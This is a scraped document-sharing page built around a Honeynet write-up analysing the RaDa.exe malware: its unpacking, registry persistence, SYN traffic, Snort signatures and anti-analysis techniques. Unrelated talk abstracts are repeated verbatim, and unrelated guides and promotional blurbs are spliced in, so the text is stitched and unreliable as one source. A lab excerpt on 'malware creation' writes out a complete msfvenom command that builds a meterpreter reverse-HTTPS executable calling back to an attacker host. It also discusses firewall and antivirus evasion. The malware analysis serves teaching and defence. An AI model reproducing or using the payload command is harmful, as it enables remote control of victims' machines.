The document provides details about analyzing a malware binary called RaDa.exe. It describes initial setup steps like verifying the file integrity and checking for known viruses. The binary was found to be packed with UPX but modified after compression to prevent decompression. Through static and dynamic analysis, it was determined that RaDa.exe installs itself to automatically run on startup, tries flooding a target IP address, and has capabilities to upload files via HTTP. A Snort signature is proposed to detect similar malware specimens. The document also lists techniques used in the binary to prevent reverse engineering like stripping debugging information and packing.
[CB21] Appearances are deceiving: Novel offensive techniques in Windows 10/11...CODE BLUE
In 2017, Microsoft announced the ARM version of Windows.
The number of devices with ARM version of Windows is increasing, such as Surface Pro X series and HP ENVY x2, and it is gradually becoming popular.
When using these ARM devices, there is a compatibility issue that existing x86/x64 applications cannot be used.
However, this problem has been addressed by providing x86/x64 emulation capabilities.
In recent years, ARM64EC has been announced, allowing for the gradual migration of x64 applications to ARM.
The aggressive introduction of these compatibility technologies is a sign of Microsoft's strong will to promote the ARM version of Windows.
On the other hand, doesn't the introduction of new compatibility technologies provide a new avenue of attack for attackers?
As far as we know, this point has not even been discussed much at this point.
Therefore, we reverse engineered the compatibility technology that exists in Windows on ARM and examined its exploitability.
We found that various techniques are available, such as code injection by modifying XTA cache files, and obfuscation by exploiting newly introduced relocation entries.
All of these techniques have in common the characteristic that the binary "appearance" and runtime behavior are different, making them difficult to detect and track.
In addition, some of the techniques can be widely exploited to interfere with static analysis or sandbox analysis.
Therefore, there is a high possibility that they will become a threat to the ARM version of Windows in the future.
In this presentation, we will explain the details of our new method and its features with demonstrations.
We hope that this presentation will be a good opportunity to develop and promote the security research of Windows on ARM.
The PoC code and detailed reverse engineering results will be available on GitHub.
Our deep dive into OceanLotus’s latest marauding campaigns shows that the group isn’t letting up in its efforts and combines legitimate code and publicly available tools with its own harmful creations.
[CB21] Appearances are deceiving: Novel offensive techniques in Windows 10/11...CODE BLUE
In 2017, Microsoft announced the ARM version of Windows.
The number of devices with ARM version of Windows is increasing, such as Surface Pro X series and HP ENVY x2, and it is gradually becoming popular.
When using these ARM devices, there is a compatibility issue that existing x86/x64 applications cannot be used.
However, this problem has been addressed by providing x86/x64 emulation capabilities.
In recent years, ARM64EC has been announced, allowing for the gradual migration of x64 applications to ARM.
The aggressive introduction of these compatibility technologies is a sign of Microsoft's strong will to promote the ARM version of Windows.
On the other hand, doesn't the introduction of new compatibility technologies provide a new avenue of attack for attackers?
As far as we know, this point has not even been discussed much at this point.
Therefore, we reverse engineered the compatibility technology that exists in Windows on ARM and examined its exploitability.
We found that various techniques are available, such as code injection by modifying XTA cache files, and obfuscation by exploiting newly introduced relocation entries.
All of these techniques have in common the characteristic that the binary "appearance" and runtime behavior are different, making them difficult to detect and track.
In addition, some of the techniques can be widely exploited to interfere with static analysis or sandbox analysis.
Therefore, there is a high possibility that they will become a threat to the ARM version of Windows in the future.
In this presentation, we will explain the details of our new method and its features with demonstrations.
We hope that this presentation will be a good opportunity to develop and promote the security research of Windows on ARM.
The PoC code and detailed reverse engineering results will be available on GitHub.
Our deep dive into OceanLotus’s latest marauding campaigns shows that the group isn’t letting up in its efforts and combines legitimate code and publicly available tools with its own harmful creations.
When it comes to actual, real-world, active malware detection there are surprisingly few choices. Most companies invest in one anti-virus vendor and when they suspect a compromise they simply wait for them to issue signatures.
If a company thinks they may be compromised but there is no AV signature, then what?
What if we could use basic python scripting to identify malware based on signatures we produce in real time? There are plenty of python tools, scripts and frameworks for malware identification including yara, pefile, nsrl hash db, pyemu, hachoir, volatility and pyew.
What if we could integrate these together into a system for centrally issuing
indicators of compromise? What if hosts we suspect as being compromised used this system to check themselves for compromise? Lets find out...
Tickling CGI Problems (Tcl Web Server Scripting Vulnerability Research)Derek Callaway
Tcl is like many scripting languages{insofar as when it is combined with CGI (Common Gateway Interface,) it tends to exhibit some rather critical security issues as unintended side-effects of dynamic web page generation processes. This whitepaper describes some important findings made by vulnerability researchers at Security Objectives Corporation. The first half of the paper will provide an overall synopsis of sensitive language features; the later half will present in detail several practical examples as case studies of the cgi.tcl and tclhttpd software packages.
Ever wanted to find out someone’s IP address online? Of course you have! Tracing “calls” on the Internet is much more complicated than on the plain old telephone network. This expose` includes a history of traditional techniques used to discover the IP address of a target user in: chat rooms, forums and other types of social networking sites. Attention will be centered around a fundamental weakness in the IRC protocol that allows client IP addresses to be determined. Proof-of-concept samples targetting multiple IRC daemons will be released. Prizes will be awarded to the most interesting submissions for an online edition of ‘Spot The Fed.’
Bio: At the time of writing, Derek is currently an independent security contractor (and in the past for @stake and Symantec.) He’s written various tool packages including a Linux stealth patch to evade nmap’s transport layer OS detection as well as porkbind, a nameserver security scanner. In 2007, he won Cenzic’s SANS contest.
From the infection phase to the command & control functionalities, this talk is a 360 degrees analysis of a recent Russian botnet distribution package. Particular features of this botnet are communication over HTTP protocol and use of PHP and Mysql.
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...CODE BLUE
We propose a new exploit technique that brings a whole-new attack surface to bypass SSRF (Server Side Request Forgery) protections. This is a very general attack approach, in which we used in combination with our own fuzzing tool to discover many 0days in built-in libraries of very widely-used programming languages, including Python, PHP, Perl, Ruby, Java, JavaScript, Wget and cURL. The root cause of the problem lies in the inconsistency of URL parsers and URL requesters.
Being a very fundamental problem that exists in built-in libraries, sophisticated web applications such as WordPress (27% of the Web), vBulletin, MyBB and GitHub can also suffer, and 0days have been discovered in them via this technique. This general technique can also adapt to various code contexts and lead to protocol smuggling and SSRF bypassing. Several scenarios will be demonstrated to illustrate how URL parsers can be exploited to bypass SSRF protection and achieve RCE (Remote Code Execution), which is the case in our GitHub Enterprise demo.
Understanding the basics of this technique, the audience won’t be surprised to know that more than 20 vulnerabilities have been found in famous programming languages and web applications aforementioned via this technique.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
In many targeted attack cases, once the attacker gains entry into the network, malware infection will spread laterally. In incident responses, investigating this lateral movement activity is very important. Methods for investigating lateral movement include log analysis of infected hosts and forensic analysis of disk images. However, in many cases, useful logs for incident investigation are not recorded in infected hosts, making it difficult to trace the attackers' behavior. This often results in not being able to get a clear picture of how the infection spreads across the network.
Therefore, we conducted investigation on attackers' C2 servers and malware to gain insight into their actives. By decoding the malware's communication logs and C2 server logs, we were able to understand the attackers’ activity after the network intrusion. We also found common patterns in how infection spread laterally. Also, even in different campaigns with different malware deployed, many common tools were used by attackers.
Taking advantage of the similarity, we figured that tracking these tools is effective in understanding lateral movements. In Windows PCs, which are the main target of APT attacks, certain
When it comes to actual, real-world, active malware detection there are surprisingly few choices. Most companies invest in one anti-virus vendor and when they suspect a compromise they simply wait for them to issue signatures.
If a company thinks they may be compromised but there is no AV signature, then what?
What if we could use basic python scripting to identify malware based on signatures we produce in real time? There are plenty of python tools, scripts and frameworks for malware identification including yara, pefile, nsrl hash db, pyemu, hachoir, volatility and pyew.
What if we could integrate these together into a system for centrally issuing
indicators of compromise? What if hosts we suspect as being compromised used this system to check themselves for compromise? Lets find out...
Tickling CGI Problems (Tcl Web Server Scripting Vulnerability Research)Derek Callaway
Tcl is like many scripting languages{insofar as when it is combined with CGI (Common Gateway Interface,) it tends to exhibit some rather critical security issues as unintended side-effects of dynamic web page generation processes. This whitepaper describes some important findings made by vulnerability researchers at Security Objectives Corporation. The first half of the paper will provide an overall synopsis of sensitive language features; the later half will present in detail several practical examples as case studies of the cgi.tcl and tclhttpd software packages.
Ever wanted to find out someone’s IP address online? Of course you have! Tracing “calls” on the Internet is much more complicated than on the plain old telephone network. This expose` includes a history of traditional techniques used to discover the IP address of a target user in: chat rooms, forums and other types of social networking sites. Attention will be centered around a fundamental weakness in the IRC protocol that allows client IP addresses to be determined. Proof-of-concept samples targetting multiple IRC daemons will be released. Prizes will be awarded to the most interesting submissions for an online edition of ‘Spot The Fed.’
Bio: At the time of writing, Derek is currently an independent security contractor (and in the past for @stake and Symantec.) He’s written various tool packages including a Linux stealth patch to evade nmap’s transport layer OS detection as well as porkbind, a nameserver security scanner. In 2007, he won Cenzic’s SANS contest.
From the infection phase to the command & control functionalities, this talk is a 360 degrees analysis of a recent Russian botnet distribution package. Particular features of this botnet are communication over HTTP protocol and use of PHP and Mysql.
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...CODE BLUE
We propose a new exploit technique that brings a whole-new attack surface to bypass SSRF (Server Side Request Forgery) protections. This is a very general attack approach, in which we used in combination with our own fuzzing tool to discover many 0days in built-in libraries of very widely-used programming languages, including Python, PHP, Perl, Ruby, Java, JavaScript, Wget and cURL. The root cause of the problem lies in the inconsistency of URL parsers and URL requesters.
Being a very fundamental problem that exists in built-in libraries, sophisticated web applications such as WordPress (27% of the Web), vBulletin, MyBB and GitHub can also suffer, and 0days have been discovered in them via this technique. This general technique can also adapt to various code contexts and lead to protocol smuggling and SSRF bypassing. Several scenarios will be demonstrated to illustrate how URL parsers can be exploited to bypass SSRF protection and achieve RCE (Remote Code Execution), which is the case in our GitHub Enterprise demo.
Understanding the basics of this technique, the audience won’t be surprised to know that more than 20 vulnerabilities have been found in famous programming languages and web applications aforementioned via this technique.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
In many targeted attack cases, once the attacker gains entry into the network, malware infection will spread laterally. In incident responses, investigating this lateral movement activity is very important. Methods for investigating lateral movement include log analysis of infected hosts and forensic analysis of disk images. However, in many cases, useful logs for incident investigation are not recorded in infected hosts, making it difficult to trace the attackers' behavior. This often results in not being able to get a clear picture of how the infection spreads across the network.
Therefore, we conducted investigation on attackers' C2 servers and malware to gain insight into their actives. By decoding the malware's communication logs and C2 server logs, we were able to understand the attackers’ activity after the network intrusion. We also found common patterns in how infection spread laterally. Also, even in different campaigns with different malware deployed, many common tools were used by attackers.
Taking advantage of the similarity, we figured that tracking these tools is effective in understanding lateral movements. In Windows PCs, which are the main target of APT attacks, certain
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create a malware by using the Metasploit Framework. You will also launch as Denial of Service (DoS) attack.Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in terminal window and press enter.
You can copy this command and paste it to the terminal window of the Kali VM.
4) After running this command, a file named
ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables such as shellcodes and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 in this malicious activity is the safest way for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and LANs (Local Area Networks). It is the default port for TLS traffic. (Mostly encrypted web traffic)
Msfvenom uses reverse_https payload to create a malicious file. The malicious file will then make a reverse https connection between the victim's and the attacker's computers once initiated by the victim.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
The Arduino is what is known as a Physical or Embedded Computing platform, which means that it is an interactive system that through the use of hardware, firmware and software can interact with its environment.
Vawtrak Trojan, also known as Neverquest or Snifula, has been an enduring banking Trojan for a long time and is still one of the most prevalent banking Trojans in the wild today.
This report forms part of Blueliv’s investigation into the Vawtrak group. Reversing the Trojan was a mandatory element of this investigation in order to understand and track the cybercriminal groups and malicious actors behind the Vawtrak malware technical security researchers and reverse engineers can use this report to increase their understanding of how the banking Trojan works.
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
MacOS forensics and anti-forensics (DC Lviv 2019) presentation. Prepared specially for DC38032. Prepared by Oleh Levytskyi (https://twitter.com/LeOleg97)
Similar to HoneyNet SOTM 32 - Windows Malware Analysis (20)
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBrad Spiegel Macon GA
Brad Spiegel Macon GA’s journey exemplifies the profound impact that one individual can have on their community. Through his unwavering dedication to digital inclusion, he’s not only bridging the gap in Macon but also setting an example for others to follow.
This 7-second Brain Wave Ritual Attracts Money To You.!nirahealhty
Discover the power of a simple 7-second brain wave ritual that can attract wealth and abundance into your life. By tapping into specific brain frequencies, this technique helps you manifest financial success effortlessly. Ready to transform your financial future? Try this powerful ritual and start attracting money today!
Multi-cluster Kubernetes Networking- Patterns, Projects and GuidelinesSanjeev Rampal
Talk presented at Kubernetes Community Day, New York, May 2024.
Technical summary of Multi-Cluster Kubernetes Networking architectures with focus on 4 key topics.
1) Key patterns for Multi-cluster architectures
2) Architectural comparison of several OSS/ CNCF projects to address these patterns
3) Evolution trends for the APIs of these projects
4) Some design recommendations & guidelines for adopting/ deploying these solutions.
# Internet Security: Safeguarding Your Digital World
In the contemporary digital age, the internet is a cornerstone of our daily lives. It connects us to vast amounts of information, provides platforms for communication, enables commerce, and offers endless entertainment. However, with these conveniences come significant security challenges. Internet security is essential to protect our digital identities, sensitive data, and overall online experience. This comprehensive guide explores the multifaceted world of internet security, providing insights into its importance, common threats, and effective strategies to safeguard your digital world.
## Understanding Internet Security
Internet security encompasses the measures and protocols used to protect information, devices, and networks from unauthorized access, attacks, and damage. It involves a wide range of practices designed to safeguard data confidentiality, integrity, and availability. Effective internet security is crucial for individuals, businesses, and governments alike, as cyber threats continue to evolve in complexity and scale.
### Key Components of Internet Security
1. **Confidentiality**: Ensuring that information is accessible only to those authorized to access it.
2. **Integrity**: Protecting information from being altered or tampered with by unauthorized parties.
3. **Availability**: Ensuring that authorized users have reliable access to information and resources when needed.
## Common Internet Security Threats
Cyber threats are numerous and constantly evolving. Understanding these threats is the first step in protecting against them. Some of the most common internet security threats include:
### Malware
Malware, or malicious software, is designed to harm, exploit, or otherwise compromise a device, network, or service. Common types of malware include:
- **Viruses**: Programs that attach themselves to legitimate software and replicate, spreading to other programs and files.
- **Worms**: Standalone malware that replicates itself to spread to other computers.
- **Trojan Horses**: Malicious software disguised as legitimate software.
- **Ransomware**: Malware that encrypts a user's files and demands a ransom for the decryption key.
- **Spyware**: Software that secretly monitors and collects user information.
### Phishing
Phishing is a social engineering attack that aims to steal sensitive information such as usernames, passwords, and credit card details. Attackers often masquerade as trusted entities in email or other communication channels, tricking victims into providing their information.
### Man-in-the-Middle (MitM) Attacks
MitM attacks occur when an attacker intercepts and potentially alters communication between two parties without their knowledge. This can lead to the unauthorized acquisition of sensitive information.
### Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC
Ellisha Heppner, Grant Management Lead, presented an update on APNIC Foundation to the PNG DNS Forum held from 6 to 10 May, 2024 in Port Moresby, Papua New Guinea.
1.Wireless Communication System_Wireless communication is a broad term that i...JeyaPerumal1
Wireless communication involves the transmission of information over a distance without the help of wires, cables or any other forms of electrical conductors.
Wireless communication is a broad term that incorporates all procedures and forms of connecting and communicating between two or more devices using a wireless signal through wireless communication technologies and devices.
Features of Wireless Communication
The evolution of wireless technology has brought many advancements with its effective features.
The transmitted distance can be anywhere between a few meters (for example, a television's remote control) and thousands of kilometers (for example, radio communication).
Wireless communication can be used for cellular telephony, wireless access to the internet, wireless home networking, and so on.
1.Wireless Communication System_Wireless communication is a broad term that i...
HoneyNet SOTM 32 - Windows Malware Analysis
1. Honeynet.org Scan of the Month (32)
Page 1 of 17
Scan of the Month – 32
(September 2004)
www.honeynet.org
Chetan Ganatra
ganatra@speedpost.net
Introduction
The challenge is to analyze a home-made malware binary to identify its inner workings,
understand its purpose and capabilities. During the process various challenge questions
are to be answered to describe the process adopted and the rationale behind each steps.
Initial Setup
On a hardened test machine (Windows XP Professional) download the binary
“RaDa.zip” from the challenge website and compute the MD5 checksum to verify
the value against the value provided at the site.
Once the integrity of the file was verified it was checked for presence of any known virus
patterns using Symantec anti-virus (Corporate Edition with latest virus signatures). Result
for the above check implied that the piece of software was not a known virus or worm or
a variant. The zip file contains an executable with similar name as “RaDa.exe”. This file
was also further checked for presence of any known viral traits however no virus/worm
was detected.
C:Sotm> md5sum RaDa.zip
a75de27ee59ab60e148efe7feee5dd3f *rada.zip
2. Honeynet.org Scan of the Month (32)
Page 2 of 17
Replies to the challenge questions
Q1. Identify and provide an overview of the binary, including the fundamental
pieces of information that would help in identifying the same specimen.
A1. Preliminary analysis of the binary by right-clicking and checking the
properties option gives the below details
File size: 20992 byte(s)
FileVersion: 1.00
CompanyName: Malware
InternalName: RaDa
OriginalFilename: RaDa
ProductName: RaDa
ProductVersion: 1.00
Language: English (US)
Further viewing the exe via a hex editor reveals the PE header and some unusual
section headings like “JDR0” and “JDR1”. This should be a sufficient clue of a
binary being modified/manipulated by a specialized software. The snap shot of
the above findings is as below.
3. Honeynet.org Scan of the Month (32)
Page 3 of 17
To check if the executable file was compressed or encrypted using any known
exe packers or crypters we pass the file through File Analyzer software called (fa)
available at http://www.vnet.times.lv
Below is the first page output of the above command. The output reveals that the
relocation table, line numbers and location symbols are stripped from the binary,
probably to make reverse engineering and debugging difficult.
Below is the snap shot for the second page of output
4. Honeynet.org Scan of the Month (32)
Page 4 of 17
The last observation gives significant information about the executable. It detects
the executable being packed with UPX v0.93 or v1.00 [PE].
UPX is “Ultimate Packer for executables” available at http://upx.sourceforge.net.
UPX compress executable files and reduces its size significantly. We tried to test
the binary with upx, however the test failed as shown in the below snap shot. The
binary seemed to be modified or protected after being compressed.
After having analyzed the binary several times in a hex editor and several trial and errors
at debugging the executable, the binary was successfully decompressed after changing
the before mentioned section headers from JRD to UPX, which is the default for files
compressed with upx.
Below is the snap shot for successful decompression of the RaDa.exe binary
5. Honeynet.org Scan of the Month (32)
Page 5 of 17
Q2. Identify and explain the purpose of the binary.
A2. The binary is a compressed installer, which, if not currently installed on local
drive, installs it self on the current root drive, adds an entry in the registry to
execute itself on every reboot and in the end copies itself in C:RaDabin
directory. With in the C:RaDa directory two other directories namely “bin” and
“tmp” are also created. The RaDa.exe binary is placed in the bin directory.
The above observations are made by using a tool called InCtrl5 that enables us to
monitor and compare system drives, registry and ini files during installations.
Below are few of the significant changes as revealed in the InCtrl5 report file
Registry Added:
HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun "RaDa"
New type: REG_SZ
New data: C:RaDabinRaDa.exe
Folders added: 3
c:RaDa
c:RaDabin
6. Honeynet.org Scan of the Month (32)
Page 6 of 17
c:RaDatmp
Files added:
c:RaDabinRaDa.exe
Date: 8/20/2004 12:38 PM
Size: 20,992 bytes
The string “Starting DDoS Smurf remote attack...” found in the rada.exe
binary suggest that its some kind of flooding tool. Further analysis done on the
data captured by network sniffer “ngsniff” revealed below facts
RaDa.exe periodically tries to initiate connection to 10.10.10.10 on port 80.
Destination IP: 10.10.10.10
Destination Port: 80
Source Port: 4400+ (Source port increased after every request)
After extracting Unicode strings from the above binary few of the below partial IP
address were also found:
http://192.168.
http://172.16.
http://10.
Probably these are the IP prefix for randomly generated IP addresses to be used
during the attack. During the test period only 10.10.10.10 IP address was found to
be used.
Text found in the binary as listed below also suggest usage of Vbscripts to upload
data files to a server via HTTP. This forms could be used to transfer the malware
to vulnerable machines.
Upload file using http And multipart/form-data
Copyright (C) 2001 Antonin Foller, PSTRUH Software
[cscript|wscript] fupload.vbs file url [fieldname]
file ... Local file To upload
7. Honeynet.org Scan of the Month (32)
Page 7 of 17
Q3. Identify and explain the different features of the binary. What are its
capabilities?
A3. Below are few listed features of the binary as observed during the analysis.
1. If the machine is not currently infected, the binary would install itself on the
system and add a registry key to automatically invoke itself at every reboot
and copy itself to the specific root location. Exact details of the installation
are given in the Answer 2 above.
2. Once executed, manually or automatically at reboot, the binary tries to
flood IP address 10.10.10.10 on port 80 after a fixed time interval.
3. Below is a list of commands line arguments as supported by the binary
--verbose
--visible
--server
--commands
--cgipath
--cgiget
--cycles
--help
--installdir
--noinstall
--uninstall
--authors
As the option name suggest the binary can be provided with the above
additional arguments to get more information related to the specific
command. The binary also supports a GUI interface, which can be invoked
by using the --gui parameter. Below is the snap shot of the gui interface
8. Honeynet.org Scan of the Month (32)
Page 8 of 17
4. The binary also has the capability to upload files via HTTP and
multipart/form-data using windows scripting. The actual code can be
retrieved from the string reference found in the binary. The script code
used in the binary can be found at below url:
http://www.motobit.com/tips/detpg_uploadvbsie.htm
The script uses ADODB.Recordset and InternetExplorer.Application
components. These components are used, as they are readily available on
all windows machine and are capable of dealing with binary data.
9. Honeynet.org Scan of the Month (32)
Page 9 of 17
Q4. Identify and explain the binary communication methods. Develop a Snort
signature to detect this type of malware being as generic as possible, so other
similar specimens could be detected, but avoiding at the same time a high false
positives rate signature.
A4. As inferred from the binary disassembly the malware uses two mode of
communication.
1. For sending data collected or to transfer itself from the victim machine
the binary uses HTTP multipart/form-data to upload or transfer binary
files to other vulnerable hosts. The offset location and the abnormal
section headings in the original binary like “JDR0” and “JDR1” can be
used as a signature pattern to identify this binary and its variants using
similar patching techniques.
2. For generating SYN flood it uses TCP/IP with a incremental source port
starting at 4400+ port number and targeting 10.10.10.10 IP address.
Further reference have been found, which indicates the binary may use
http://192.168. and http://172.16. for the attack.
Below is a partial list of the sniffer log generated using ngSniff. (Few IP
header details are removed clarity).
IP HEADER 172.16.15.28 -> 10.10.10.10
------------------------------------------
IP->version: 4
IP->ihl: 5
IP->tos: 0
IP->tot_len: 48
IP->id: 31250
IP->frag_off: 64
IP->ttl: 128
IP->protocol: 6
IP->checksum: 3609
TCP HEADER
----------
TCP->sport: 4755
TCP->dport: 80
TCP->seq: 1550194942
TCP->ack: 0
TCP->off: 7
TCP->flags: SYN
TCP->window: 64240
TCP->checksum: 38465
TCP->urp: 0
10. Honeynet.org Scan of the Month (32)
Page 10 of 17
IP HEADER 172.16.15.28 -> 10.10.10.10
------------------------------------------
IP->version: 4
IP->ihl: 5
IP->tos: 0
IP->tot_len: 48
IP->id: 31506
IP->frag_off: 64
IP->ttl: 128
IP->protocol: 6
IP->checksum: 3353
TCP HEADER
----------
TCP->sport: 4756
TCP->dport: 80
TCP->seq: -769802498
TCP->ack: 0
TCP->off: 7
TCP->flags: SYN
TCP->window: 64240
TCP->checksum: 31113
TCP->urp: 0
Snort signature for identifying this binary communication is as suggested below.
alert tcp any 4400:5000 -> 10.10.10.10 80 (msg: "RaDa.EXE DoS
attempt"; flags: S; ack: 0; classtype: DoS; Priority:1; react:
Block; reference: http://www.honeynet.org/scans/scan32;)
alert ip any 4400:5000 -> 10.10.10.10 80 (msg: "RaDa.EXE DoS
attempt"; ip_proto: tcp; fragoffset: 64; reference:
http://www.honeynet.org/scans/scan32;)
11. Honeynet.org Scan of the Month (32)
Page 11 of 17
Q5. Identify and explain any techniques in the binary that protect it from being
analyzed or reverse engineered.
A5. Below are few of the techniques identified during the analysis
1. Details regarding Relocation, Line numbers and Symbol tables were
stripped from the binary to remove any debugging information. This
makes the task of debugging binaries more difficult
2. The executable “RaDa.exe” was packed using UPX v0.93 or v1.00.
Additionally the default UPX section headers were changed to JDR to
defeat known packer detection tools. Replacing the section heading
from JDR to UPX made it possible to decompress the binary using the
latest version of UPX v1.25. Below are few snap shots that reveal the
above information.
12. Honeynet.org Scan of the Month (32)
Page 12 of 17
Rada.exe after modifying the section headers.
3. In one instance while analyzing the Unicode strings from the binary, a
reference was found to a registry key to check the path where VMWare
tools are installed. This may be one of the detection techniques used to
check and exit if virtual host, which are generally used for testing is
found. However during the review no significant trail was found to
check this key.
HKLMSoftwareVMware, Inc.VMware ToolsInstallPath
13. Honeynet.org Scan of the Month (32)
Page 13 of 17
Q6. Categorize this type of malware (virus, worm...) and justify your reasoning.
A6. Considering the recent variants and techniques of virus and worms found in
the wild, the strict difference between definitions of virus and worms has
diminished. Most of the recent malware displays hybrid traits of infecting like a
virus and spreading like worms.
This binary may be categorized as a virus as it needs some action to be
performed by the victim in terms of downloading the malware and executing the
same once. The above functionality could have been automated by combining
certain other exploit mechanisms like download and execute via IE browser with
out user’s consent.
Since the prime functionality as revealed from the binary was to conduct a DoS
on a targeted server. The binary does not depict traits of a worm to spread itself.
However we have found evidence within the malware to upload binary data via
HTTP. Probably this mechanism is used to spread copies of it to vulnerable hosts.
14. Honeynet.org Scan of the Month (32)
Page 14 of 17
Q7. Identify another tool that has demonstrated similar functionality in the past.
A7. As inferred from the binary this functionality is also demonstrated by various
DoS tools based on Smurf attack.
Several packet crafting tools like dsniff, hping, packetX etc can easily be used and
modified to simulate similar functionality as demonstrated by RaDa.
15. Honeynet.org Scan of the Month (32)
Page 15 of 17
Q8. Suggest detection and protection methods to fight against the threats
introduced by this binary.
A8. Combination of various detection mechanisms is required to defend such
binaries with hybrid threats. We suggest a proactive approach by having a
stringent access control and content filtering policies at the gateway level to
prohibit users from downloading or uploading binary data in any form.
Once identified, generic IDS rules may be installed on gateway servers to detect
and block offending hosts.
Considering the usage of client side scripts for uploading data it is advisable to
harden clients machine by disabling windows scripting. On one of the hardened
test machine with minimum software installed, the binary “rada.exe” could not
execute properly even once. Few of the error message displayed during various
installation attempts are as below
16. Honeynet.org Scan of the Month (32)
Page 16 of 17
Bonus Question:
Q9. Is it possible to interrogate the binary about the person(s) who developed
this tool? In what circumstances and under which conditions?
A9. It is evident from the text found in the binary about the authors of the binary.
Below is the string as found in the decompressed binary.
Authors: Raul Siles & David Perez, 2004
Few of the components found in the binary are compiled from various sources
already available on the net. The vbscript uploading form embedded in the binary
can be found at http://www.motobit.com/tips/detpg_uploadvbsie.htm authored
by Antonin Foller, of PSTRUH Software
UPX packer is used to compress the finalized binary.
17. Honeynet.org Scan of the Month (32)
Page 17 of 17
Q10. What advancements in tools with similar purposes can we expect in the
near future?
A10. Various existing tools already display advance techniques in terms of anti-
debugging and anti-detection capabilities. Many of such techniques were not found to be
implemented in the current binary.
The malware opted to install itself in system root drive, it would have been more difficult
for a casual observer to witness its presence if the binary would have been installed in a
unsuspicious or benign location.
The binary was compressed using a readily available and well-known compression
software upx, which made its detection easy at an early stage. Run-time encryption was
not employed. Using proprietary or modified versions of compressors and encryptions
would have made disassembly and analysis a very difficult task.
It was observed that when rada.exe was specifically executed couple of times, it
did not check for its already instance running and the same can be seen in the
below snapshot. No attempts were made to hide from system process listing.
Usage of windows scripting is always prone to various client side configuration settings.
Coding the transfer routines in a high-level language would have made identification and
analysis difficult.
We can expect malware tools of future to be carefully designed with intent to be
deceptive and thwart known identifying and debugging techniques.